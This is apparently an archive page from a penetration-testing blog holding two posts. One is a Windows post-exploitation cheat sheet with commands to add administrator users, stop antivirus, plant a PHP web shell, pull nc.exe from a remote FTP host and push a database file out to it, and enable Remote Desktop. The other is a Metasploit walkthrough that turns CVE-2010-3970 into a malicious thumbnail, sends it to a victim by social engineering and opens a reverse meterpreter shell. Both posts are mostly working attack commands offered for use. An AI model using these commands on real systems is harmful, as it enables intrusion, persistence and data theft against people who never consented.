Archive for the Penetration testing Category

Manual pentesting cheatsheet (Windows)

Posted in How To, Penetration testing with tags , , , on June 5, 2012 by stormsecurity

This is a list of commands that can be useful when you have a shell on a Windows box and you want to do local discovery, escalate privileges and pivot (without using tools as Metasploit):

View your current user: whoami
View information about the current user: net user myuser(for a local user)
net user myuser /domain (for a domain user)
View the local groups: net localgroup
View the local administrators: net localgroup Administrators
Add a new user: net user myuser mypass /add
Add a user in the local Administrators group: net localgroup Administrators myuser /add
View the domain name of current machine: net config workstation
net config server
View the name of the domain controller: reg query "HKEY_LOCAL_MACHINE\ SOFTWARE\Microsoft\Windows\ CurrentVersion\Group Policy\ History" /v DCName
View the list of domain admins: net group "Domain Admins" /domain
View the list of started services (search for antivirus): net start
sc query
Stop a service: net stop "Symantec Endpoint Protection"
View the list of started processes and the owner: tasklist /v
Kill a process by its name taskkill /F /IM "cmd.exe"
Abort a shutdown/restart countdown shutdown /a
Create php backdoor/shell echo ^<?php echo passthru($_GET['cmd']); ?^> > C:\inetpub\wwwroot\s.php
Download an executable from a remote FTP server echo open 10.1.2.3> C:\script.txt
echo user myftpuser>> C:\script.txt
echo pass myftppass>> C:\script.txt
echo get nc.exe>> C:\script.txt
echo bye>> C:\script.txt
ftp -s:script.txt
Upload a file to a remote FTP server echo open 10.1.2.3> C:\script.txt
echo user myftpuser>> C:\script.txt
echo pass myftppass>> C:\script.txt
echo put E:\backups\database.dbf>> C:\script.txt
echo bye>> C:\script.txt
ftp -s:script.txt
View established connections of current machine: netstat -a -n -p tcp | find "ESTAB"
View open ports of current machine: netstat -a -n -p tcp | find "LISTEN"
netstat -a -n -p udp
View network configuration: netsh interface ip show addresses
netsh interface ip show route
netsh interface ip show neighbors
View current network shares: net share
Mount a remote share with the rights of the current user: net use K: \\10.1.2.3\C$
dir K:
Enable Remote Desktop: reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

Update:

A friend pointed me to a more comprehensive list of Windows commands that can be utilized for post-exploitation here. Thanks, Cosmin! 😉

Advertisements

From Windows thumbnails vulnerability to remote shell

Posted in How To, Penetration testing with tags , , , , , on January 9, 2011 by stormsecurity

Beware of thubnails!

CVE-2010-3970 – Windows Graphics Rendering Engine vulnerability – is still a 0-day (9 January 2011) and the exploit is public.

Exploitation is pretty easy.The victim just needs to view a file like CV.doc in Windows Explorer – thumbnails mode – and the payload gets executed on a fully patched Windows XP SP3 machine.

This thumbnail (CV.doc)executes the Windows calculator:

Exploit thumbnail vulnerability

Exploiting the thumbnail vulnerability CVE-2010-3970

Things can get more serious when the attacker is able to open a meterpreter session with the victim’s machine. This can also be easily accomplished with Metasploit:

1. Creating the malicious thumbnail in msfconsole:

msf > use exploit/windows/fileformat/ms11_xxx_createsizeddibsection
> show options
> set FILENAME CV.doc
> set OUTPUTPATH /root
> set PAYLOAD windows/meterpreter/reverse_tcp
> set LHOST 192.168.84.1
> set LPORT 80
> exploit

2. Sending the thumbnail to the victim (e.g. by social engineering attack).

3. Listening for incoming connections on the attacker machine:

msf > use exploit/multi/handler
> set PAYLOAD windows/meterpreter/reverse_tcp
> set LHOST 192.168.84.1
> set LPORT 80
> exploit

Et voila! The shell we were waiting for…

Meterpreter session

Meterpreter session open

Until a patch will be provided, Microsoft clients can use the Fix it tool described in this support page.